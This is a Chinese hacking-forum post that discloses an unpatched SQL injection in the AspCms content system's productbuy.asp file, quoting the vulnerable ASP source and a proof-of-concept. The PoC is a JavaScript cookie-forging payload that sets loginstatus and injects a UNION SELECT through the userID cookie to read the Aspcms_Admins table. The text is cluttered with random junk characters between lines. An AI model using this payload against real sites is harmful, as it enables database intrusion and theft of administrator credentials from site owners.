好久没上土司了,上来一看发现在删号名单内.....
`2 b$ I4 p8 M, k& \; B也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。: Q0 X/ E: w8 B! K- t5 R: C/ l
废话不多说,看代码:
1 K. u& T& K1 _4 B4 Q8 o6 D9 D7 x4 g
% n) _4 }- P! T1 N, `2 @' G<%7 f. o! }' |" |, V
8 g) t9 E$ w% x: F9 b
if action = "buy" then& Q& }5 r/ R4 _5 g4 D9 `- R' c
# P+ a8 l8 E' M
addOrder()+ P& }7 h& O1 k; F& }; {9 O
4 T" r% p! {& C0 U: k+ O: p3 oelse
5 g7 u/ J; g& j" D$ a9 M
! i# L+ u$ A/ I+ Q7 M echoContent()! u4 V% E; S$ Y, w7 m
$ ~) V4 c% c* d/ N) `
end if
* ~( O) `5 {2 w, x9 w. E/ X
2 G4 K) r7 _# D( c% E6 m7 ~% B
: | ?$ O0 d, q d1 J
8 X% K3 ^& ?: |$ p% t2 P5 ]2 e……略过9 `$ e5 e) p' ~7 g
, C& M, S2 ^# g2 M9 S3 x! f# K
6 P6 H+ c, t6 j7 I) O ]' X( t1 @0 v3 [- _! a1 G& d2 Q' {3 Q! q1 Z7 N0 T. G
Sub echoContent()
! [/ ~; f" E# y ]: x6 U, l9 E5 R* O2 o% P/ L% s
dim id
" n# ^5 S: z- s. |% r' R$ E, B) ]8 l" ?2 E4 g' ^# T
id=getForm("id","get")( r* w+ b/ a* z" H+ w4 |8 c
8 n3 e# r& B+ _! P( R, j; r6 b
5 [* k( y8 E' x' G( @! ?3 H# }: K; S1 M- N/ R1 k
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
' b ~1 w. A+ S9 y( y# r$ o4 g+ ]# b$ G M& i; x7 b
d) m! ?$ @( `# R+ [0 a" ~: Q0 d" P4 Z: J9 p
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")7 H7 I$ S$ j% P ^
+ {( [2 \6 B2 r dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct4 a, l9 T g% ~: V" K
/ ?. v3 U) a! l% V) o
Dim templatePath,tempStr, E9 w& Y0 @$ @" |4 k3 h r
7 ?8 ?, U$ K2 t- V" o: } templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"# ]! q2 s& Q) G/ P
$ ]; S: T; x% [* D7 U" `1 B
8 y* w8 J5 r$ f, o' w# l7 ]7 `8 W& I8 i+ A% I5 W0 S
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! a& W3 M3 j- `4 o
3 ` g/ D1 z6 ?/ O& j/ j4 b" d4 I7 Y' } selectproduct=rsObj(0)
2 J: a* a4 B3 T7 U" V7 R
3 o+ O6 i% e( m, f' z$ {: ^6 T
+ F: K9 h' K5 ?1 E. g: G
' q/ b8 s. \& |& n( o. N Dim linkman,gender,phone,mobile,email,qq,address,postcode
1 `1 |2 O% ?1 }# f( D: j5 v% {1 V( A- Y t# _0 e* K, D+ X
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
" L+ }. n# J0 @* z) l% r& X6 S
( U8 Q8 p9 y {6 e% z if rCookie("loginstatus")=1 then
( d: h% J% M# z: n- Y& C4 Q/ \3 Z. S* q
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
* h& Y, K) @) M2 E& {
I% q( e! h. D; Z) j, ] linkman=rsObj("truename")
; S1 W6 a1 N0 b% t. o
, a8 n2 D8 P/ u+ M! h, j gender=rsObj("gender")
% l0 s# M6 } ^, ^) C: _
1 e" e, u6 K/ B* n6 l3 k9 X4 m phone=rsObj("phone")9 V/ l! _% e6 T
4 y0 ~5 i- f4 u* i( u- G; V
mobile=rsObj("mobile")
- w9 A" w4 M6 i! ^; D9 T3 W1 X! a; I, }0 ^8 Y
email=rsObj("email")8 K0 ?9 {: R9 N) k/ _4 [$ p
8 z( j, W8 T+ \* y: p$ u7 Z% C
qq=rsObj("qq")2 {& U( k. H* \- @8 h
; j+ h; L3 M/ ?; O) z- Z
address=rsObj("address")
+ N7 c& ?' x+ o: F
7 u7 w. V$ [( P, P/ D postcode=rsObj("postcode")
; E) L: G! ^* g! H% y0 P1 c. ?
# `( `# M! n) U. T. L6 w else
9 d; `9 H* |9 v- h' G5 Q& o
- Y# e5 f/ i6 k8 @; g gender=1+ H/ w- n/ H6 c U. L0 F6 R
2 [1 {6 M- x6 _( q
end if
# e L. t" T$ L
% o* D S& {4 k4 Y rsObj.close()* k" g. r* H4 f* d5 ^. t$ E& i1 }
" ^" m6 ^; y" t
8 O0 h2 f0 P7 L
, q. e" Y' l: W" K. g with templateObj
% |/ u" @3 Q3 ]: G A6 B6 z [0 D3 O0 J$ p4 Q* ]
.content=loadFile(templatePath)
6 G# }6 E& a( j0 Q( o( x0 s
; H# J; {+ m& X/ J+ x .parseHtml()5 y% {# @2 ?: n2 J+ R
" Z; J6 p* j' O) x+ j .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
* U! x, Z7 t6 M5 z* `$ B$ w) j+ T% i* s, i; O3 t; I
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 0 ]% u' @. p$ e
& t9 [3 ] X5 e! H: |) C .content=replaceStr(.content,"[aspcms:gender]",gender) s. W. S( f2 c
- ?7 Y' T N* ~ .content=replaceStr(.content,"[aspcms:phone]",phone)
6 T8 v; C( r9 \8 r+ _3 \" n+ J6 d$ _) r b
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
9 T# t+ \9 Q% \; M3 x* c& B- T" @" |1 N+ E
.content=replaceStr(.content,"[aspcms:email]",email)
. V$ y9 ?& V' t! u+ |% d* o' I+ ~( G/ W" g$ P) H* M/ [/ c
.content=replaceStr(.content,"[aspcms:qq]",qq) . g4 i" x0 o2 W; p8 I$ Q
, R2 A' w. j8 z% J .content=replaceStr(.content,"[aspcms:address]",address)
; o2 M* T5 N8 D1 m) O2 ?" P1 n& O% B9 Y2 ^+ n; A) r4 h! s2 c
.content=replaceStr(.content,"[aspcms:postcode]",postcode) + ]4 V: v1 k( O% L* S ^
- ]4 j$ S& ~3 y, R$ i .parseCommon() 3 y* l2 j9 Z8 n) ?6 @$ D
: @% G3 s/ K' C$ Y& e! |* `
echo .content
. @6 ?! H; L4 p
7 A- p7 x5 x% z! t end with
7 A- u8 R; m) C) A) o; f# O- _6 m7 [* W S* V! H* E" W& \
set templateobj =nothing : terminateAllObjects. F% ~7 o" j7 Y$ G y
$ A8 C* X* q% Q# t9 @+ GEnd Sub) t' d& M M* X, T! r
漏洞很明显,没啥好说的( R! I; E/ w9 i
poc:7 F7 F7 K+ ?8 J% t" u+ y% t
% c1 K* n, ~6 i* B: t7 d
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子7 ]+ s; \' ^( q7 M9 U6 u: a. o
' a, R0 w, c9 O7 _1 ~% w( A4 s9 r
|
发表于 2012-12-27 08:35:05
收藏
支持
反对